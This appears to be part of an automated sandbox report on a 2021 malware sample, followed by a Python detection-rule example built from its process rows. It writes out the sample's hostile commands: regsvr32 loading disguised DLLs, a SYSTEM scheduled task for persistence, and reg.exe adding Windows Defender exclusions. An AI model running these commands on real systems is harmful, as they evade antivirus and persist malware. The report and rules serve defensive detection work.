      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:16:51:26
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Drezd1.red
      Imagebase:0xdf0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      General

      Start time:16:51:28
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0xab0000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:16:51:29
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
      Imagebase:0xffb80000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:16:51:30
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -s 'C:\Users\user\Drezd.red'
      Imagebase:0xdf0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      General

      Start time:16:51:31
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Drezd2.red
      Imagebase:0xffb80000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:16:51:31
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Drezd2.red
      Imagebase:0xdf0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:16:51:32
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0xab0000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:16:51:33
      Start date:27/09/2021
      Path:C:\Windows\System32\reg.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0'
      Imagebase:0xfff70000
      File size:74752 bytes
      MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:16:51:33
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0xab0000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:16:51:35
      Start date:27/09/2021
      Path:C:\Windows\System32\reg.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Benqxuam' /d '0'
      Imagebase:0xffd60000
      File size:74752 bytes
      MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:16:53:00
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
      Imagebase:0xffe60000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:16:53:00
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -s 'C:\Users\user\Drezd.red'
      Imagebase:0xa0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
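
      Read in order, the System Behavior table is the whole chain: Excel registers the downloaded payload through regsvr32 under a non-DLL name (Drezd.red, Drezd1.red, Drezd2.red), each 64-bit regsvr32 hands the 32-bit DLL to its SysWOW64 copy, explorer.exe is started from SysWOW64 as an injection host, schtasks creates a one-shot task that re-runs the DLL as SYSTEM at 16:53 (and the two 16:53:00 rows show it firing), and reg.exe adds two Windows Defender path exclusions. What follows is an added example, not part of the report, that re-reads those rows with the checks a detection engineer would write for them; it approximates the Sigma "Regsvr32 Command Line Without DLL" and "Schedule system process" matches named in the overview and adds Defender-exclusion and explorer-path checks. The rows are copied from the table; the rule names, the list of script-host names, the loadable extensions and the "explorer belongs in C:\Windows" heuristic are assumptions of the example.

```python
import re

# Rows copied from the System Behavior table above (report data, not constructed):
# (start time, image path, command line). The SysWOW64 regsvr32 rows really begin with a
# space: the 64-bit regsvr32 hands a 32-bit DLL to its SysWOW64 copy, whose recorded
# command line has no argv[0], so a rule keyed on the first token alone would miss them.
PROCESSES = [
    ("16:51:13", r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     r"'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding"),
    ("16:51:23", r"C:\Windows\System32\regsvr32.exe", r"regsvr32 -silent ..\Drezd.red"),
    ("16:51:23", r"C:\Windows\SysWOW64\regsvr32.exe", r" -silent ..\Drezd.red"),
    ("16:51:25", r"C:\Windows\SysWOW64\explorer.exe", r"C:\Windows\SysWOW64\explorer.exe"),
    ("16:51:26", r"C:\Windows\System32\regsvr32.exe", r"regsvr32 -silent ..\Drezd1.red"),
    ("16:51:26", r"C:\Windows\SysWOW64\schtasks.exe",
     r"'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq "
     r"/tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05"),
    ("16:51:26", r"C:\Windows\SysWOW64\regsvr32.exe", r" -silent ..\Drezd1.red"),
    ("16:51:28", r"C:\Windows\SysWOW64\explorer.exe", r"C:\Windows\SysWOW64\explorer.exe"),
    ("16:51:29", r"C:\Windows\System32\regsvr32.exe", r"regsvr32.exe -s 'C:\Users\user\Drezd.red'"),
    ("16:51:30", r"C:\Windows\SysWOW64\regsvr32.exe", r" -s 'C:\Users\user\Drezd.red'"),
    ("16:51:31", r"C:\Windows\System32\regsvr32.exe", r"regsvr32 -silent ..\Drezd2.red"),
    ("16:51:31", r"C:\Windows\SysWOW64\regsvr32.exe", r" -silent ..\Drezd2.red"),
    ("16:51:32", r"C:\Windows\SysWOW64\explorer.exe", r"C:\Windows\SysWOW64\explorer.exe"),
    ("16:51:33", r"C:\Windows\System32\reg.exe",
     r"C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' "
     r"/f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0'"),
    ("16:51:33", r"C:\Windows\SysWOW64\explorer.exe", r"C:\Windows\SysWOW64\explorer.exe"),
    ("16:51:35", r"C:\Windows\System32\reg.exe",
     r"C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' "
     r"/f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Benqxuam' /d '0'"),
    ("16:53:00", r"C:\Windows\System32\regsvr32.exe", r"regsvr32.exe -s 'C:\Users\user\Drezd.red'"),
    ("16:53:00", r"C:\Windows\SysWOW64\regsvr32.exe", r" -s 'C:\Users\user\Drezd.red'"),
]

TOKEN = re.compile(r"'[^']*'|\S+")          # the report renders double quotes as '
LOADABLE_EXT = (".dll", ".ocx", ".ax")       # what regsvr32 is normally handed (assumption)
LOLBINS = ("regsvr32", "rundll32", "mshta", "wscript", "cscript", "powershell")


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def arguments(image, cmdline):
    """Tokens after argv[0]; argv[0] is dropped only when it really names the image."""
    tokens = [t.strip("'") for t in TOKEN.findall(cmdline)]
    if tokens and image_name(tokens[0]).split(".")[0] == image.split(".")[0]:
        tokens = tokens[1:]
    return tokens


def switch_value(cmdline, switch):
    """Value following /switch, up to the next /switch (schtasks and reg.exe syntax)."""
    m = re.search(r"/%s\s+(.+?)(?=\s+/[A-Za-z]+\b|$)" % switch, cmdline, re.I)
    return m.group(1).strip("'") if m else None


def triage(processes):
    findings = []
    for start, path, cmdline in processes:
        image = image_name(path)
        args = arguments(image, cmdline)
        if image == "regsvr32.exe":             # regsvr32 given something that is not a DLL
            for target in args:
                if not target.startswith(("-", "/")) and not target.lower().endswith(LOADABLE_EXT):
                    findings.append({"time": start, "rule": "regsvr32_non_dll", "detail": target})
        elif image == "schtasks.exe" and any(a.lower() == "/create" for a in args):
            run_as = switch_value(cmdline, "RU") or ""
            action = switch_value(cmdline, "tr") or ""
            if "system" in run_as.lower() and any(b in action.lower() for b in LOLBINS):
                findings.append({"time": start, "rule": "schtasks_system_lolbin",
                                 "detail": f"{run_as} runs {action} at {switch_value(cmdline, 'ST')}"})
        elif image == "reg.exe" and len(args) > 1 and args[0].lower() == "add":
            if "windows defender\\exclusions" in args[1].lower():
                findings.append({"time": start, "rule": "defender_exclusion",
                                 "detail": switch_value(cmdline, "v")})
        elif image == "explorer.exe" and path.lower() != r"c:\windows\explorer.exe":
            findings.append({"time": start, "rule": "explorer_odd_path", "detail": path})
    return findings


def task_fired(processes, schtasks_cmdline):
    """Start times of processes that ran the task's /tr payload path at its /ST time."""
    start_at = switch_value(schtasks_cmdline, "ST") or ""
    payload = re.search(r"[A-Za-z]:(?:\\[\w.]+)+", switch_value(schtasks_cmdline, "tr") or "")
    if not start_at or not payload:
        return []
    return [t for t, _, c in processes if t.startswith(start_at) and payload.group(0) in c]


if __name__ == "__main__":
    for f in triage(PROCESSES):
        print(f"{f['time']}  {f['rule']:24} {f['detail']}")
    print("scheduled task observed running at:", task_fired(PROCESSES, PROCESSES[5][2]))
```

      Two points the rows make for a rule writer: key the regsvr32 check on the image path, not the command line's first token, or the SysWOW64 children (command lines beginning with a space) go unseen; and the /ST value of the schtasks row is worth carrying into a correlation, because the matching 16:53:00 regsvr32 rows are the evidence that the persistence actually executed, not just that it was configured.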

      Disassembly

      Code Analysis
